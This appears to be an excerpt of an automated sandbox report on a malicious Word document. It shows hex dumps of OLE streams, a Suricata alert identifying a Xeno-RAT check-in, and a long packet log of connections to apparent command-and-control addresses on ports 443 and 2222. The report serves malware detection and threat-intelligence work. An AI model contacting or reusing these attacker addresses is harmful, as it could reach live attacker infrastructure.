Data Raw:	01 3f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 79 d4 65 69 19 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	1.045776662127258
Base64 Encoded:	False
Data ASCII:	. _ . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j , E , E . . . . . . . . . . . . . . . . . . . . . . . . . . N / . . N / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . f . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 2c 45 2c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 4e 2f 00 00 4e 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T10:30:33.399094+0100	2050110	ET MALWARE [ANY.RUN] Xeno-RAT TCP Check-In	1	87.120.120.27	2222	192.168.2.22	49170	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 10:29:48.108491898 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:48.108542919 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:48.108620882 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:48.114562988 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:48.114579916 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:49.890937090 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:49.891037941 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:49.896460056 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:49.896480083 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:49.896821976 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:49.896877050 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:49.967729092 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.011336088 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.478101969 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.478156090 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.478193998 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.478374004 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.478374004 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.478416920 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.478463888 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.484230995 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.592751980 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.592809916 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.592988968 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.592989922 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.593019962 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.593046904 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.593063116 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.638819933 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.638879061 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.638895988 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.638916969 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.638932943 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.638932943 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.638951063 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.639045954 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.762263060 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.762315035 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.762347937 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.762389898 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.762404919 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.762434959 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.762504101 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.790800095 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.790853977 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.790910006 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.790927887 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.790941954 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.790968895 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.791076899 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.822936058 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.822983980 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.823154926 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.823154926 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.823170900 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.823194027 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.823206902 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.932708025 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.932756901 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.932809114 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.932830095 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.932842970 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.932863951 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.932950974 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.953926086 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.953969002 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.953996897 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.954008102 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.954020977 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.954034090 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.954123020 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.971527100 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.971575975 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.971611977 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.971628904 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.971640110 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.971662998 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.971714020 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.991271019 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.991329908 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.991339922 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.991347075 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.991372108 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.991384983 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.991429090 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.999171972 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.999239922 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.999241114 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.999279022 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.999362946 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.999377012 CET	443	49161	87.121.86.205	192.168.2.22
Dec 6, 2024 10:29:50.999386072 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:50.999423981 CET	49161	443	192.168.2.22	87.121.86.205
Dec 6, 2024 10:29:57.929217100 CET	49162	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:29:58.049303055 CET	2222	49162	87.120.120.27	192.168.2.22
Dec 6, 2024 10:29:58.051814079 CET	49162	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:00.183830023 CET	2222	49162	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:00.183970928 CET	49162	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:00.317980051 CET	49163	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:00.438020945 CET	2222	49163	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:00.438107014 CET	49163	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:02.572254896 CET	2222	49163	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:02.572318077 CET	49163	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:02.711007118 CET	49164	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:02.830986977 CET	2222	49164	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:02.831114054 CET	49164	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:04.961714983 CET	2222	49164	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:04.961888075 CET	49164	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:05.060390949 CET	49165	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:05.180315971 CET	2222	49165	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:05.180392981 CET	49165	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:07.307179928 CET	2222	49165	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:07.307261944 CET	49165	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:07.417316914 CET	49166	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:07.537286043 CET	2222	49166	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:07.537453890 CET	49166	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:09.697206974 CET	2222	49166	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:09.697349072 CET	49166	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:09.818065882 CET	49167	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:09.938441992 CET	2222	49167	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:09.938620090 CET	49167	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:12.092314959 CET	2222	49167	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:12.092781067 CET	49167	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:12.189317942 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:12.309247017 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:12.309390068 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:14.667064905 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:14.692172050 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:14.812283993 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:15.084779978 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:15.087116957 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:15.207030058 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:15.477164030 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:15.669122934 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:15.669233084 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:15.722166061 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:15.842061043 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:16.132560015 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:16.135778904 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:16.255520105 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:16.255671024 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:16.338634968 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:17.459187984 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:17.460726976 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:17.582946062 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:17.852987051 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:17.892158985 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:17.906586885 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:17.928653002 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:17.947803974 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:18.011892080 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:18.026357889 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:18.048712969 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:18.069021940 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:19.352313042 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:19.353517056 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:19.355882883 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:19.357239962 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:19.473443985 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:19.473588943 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:19.477303028 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:19.567852020 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:20.675327063 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:20.677222967 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:20.754812002 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:20.756941080 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:20.797059059 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:20.877203941 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:21.070174932 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:21.071924925 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:21.072408915 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:21.072881937 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:21.073344946 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:21.191751957 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:21.192037106 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:21.192488909 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:21.193002939 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:22.148225069 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:22.149862051 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:22.269747019 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:22.484040976 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:22.490665913 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:22.610532045 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:23.573246002 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:23.574877024 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:23.694564104 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:24.897176027 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:24.900796890 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:24.982326031 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:24.983851910 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:25.021301031 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:25.103880882 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:26.415674925 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:26.417634010 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:26.537497997 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:27.305300951 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:27.309969902 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:27.429919004 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:27.829886913 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:27.831769943 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:27.951649904 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:29.231834888 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:29.233418941 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:29.353312016 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:29.718638897 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:29.722846985 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:29.842799902 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:30.639153004 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:30.640805006 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:30.760658979 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:32.032990932 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:32.034585953 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:32.133480072 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:32.136930943 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:32.154555082 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:32.258125067 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.273607016 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.273704052 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.274276972 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.274332047 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.274894953 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.274951935 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.278701067 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.278896093 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.279227972 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.281748056 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.281960964 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.282191992 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.282639027 CET	49171	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.398463964 CET	2222	49168	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.398519993 CET	49168	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.398700953 CET	2222	49169	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.398752928 CET	49169	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.399094105 CET	2222	49170	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.399130106 CET	49170	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:33.402415991 CET	2222	49171	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:33.402508020 CET	49171	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:35.528418064 CET	2222	49171	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:35.528620005 CET	49171	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:35.636281967 CET	49172	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:35.756083012 CET	2222	49172	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:35.756305933 CET	49172	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:37.884517908 CET	2222	49172	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:37.884598970 CET	49172	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:37.992218971 CET	49173	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:38.112054110 CET	2222	49173	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:38.112245083 CET	49173	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:40.263077974 CET	2222	49173	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:40.263220072 CET	49173	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:40.378953934 CET	49174	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:40.498853922 CET	2222	49174	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:40.499018908 CET	49174	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:42.619723082 CET	2222	49174	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:42.619837046 CET	49174	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:42.734298944 CET	49175	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:42.854168892 CET	2222	49175	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:42.854232073 CET	49175	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:45.001750946 CET	2222	49175	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:45.001822948 CET	49175	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:45.105541945 CET	49176	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:45.225276947 CET	2222	49176	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:45.225344896 CET	49176	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:47.373083115 CET	2222	49176	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:47.373147964 CET	49176	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:47.492444992 CET	49177	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:47.612354040 CET	2222	49177	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:47.612441063 CET	49177	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:49.745306015 CET	2222	49177	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:49.745440960 CET	49177	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:49.848084927 CET	49178	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:49.968323946 CET	2222	49178	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:49.968441963 CET	49178	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:52.123068094 CET	2222	49178	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:52.123373032 CET	49178	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:52.219454050 CET	49179	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:52.339320898 CET	2222	49179	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:52.339389086 CET	49179	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:54.482114077 CET	2222	49179	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:54.482173920 CET	49179	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:54.590691090 CET	49180	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:54.710760117 CET	2222	49180	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:54.710834026 CET	49180	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:56.853899002 CET	2222	49180	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:56.854002953 CET	49180	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:56.961905003 CET	49181	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:57.081898928 CET	2222	49181	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:57.082175970 CET	49181	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:59.251535892 CET	2222	49181	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:59.251658916 CET	49181	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:59.348725080 CET	49182	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:30:59.468770027 CET	2222	49182	87.120.120.27	192.168.2.22
Dec 6, 2024 10:30:59.468863964 CET	49182	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:01.603691101 CET	2222	49182	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:01.603770971 CET	49182	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:01.704330921 CET	49183	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:01.824503899 CET	2222	49183	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:01.824642897 CET	49183	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:04.029329062 CET	2222	49183	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:04.029441118 CET	49183	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:04.137763977 CET	49184	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:04.257639885 CET	2222	49184	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:04.257788897 CET	49184	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:06.404369116 CET	2222	49184	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:06.404455900 CET	49184	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:06.508944035 CET	49185	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:06.628890038 CET	2222	49185	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:06.629004955 CET	49185	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:08.779575109 CET	2222	49185	87.120.120.27	192.168.2.22
Dec 6, 2024 10:31:08.779638052 CET	49185	2222	192.168.2.22	87.120.120.27
Dec 6, 2024 10:31:08.880544901 CET	49186	2222	192.168.2.22	87.120.120.27
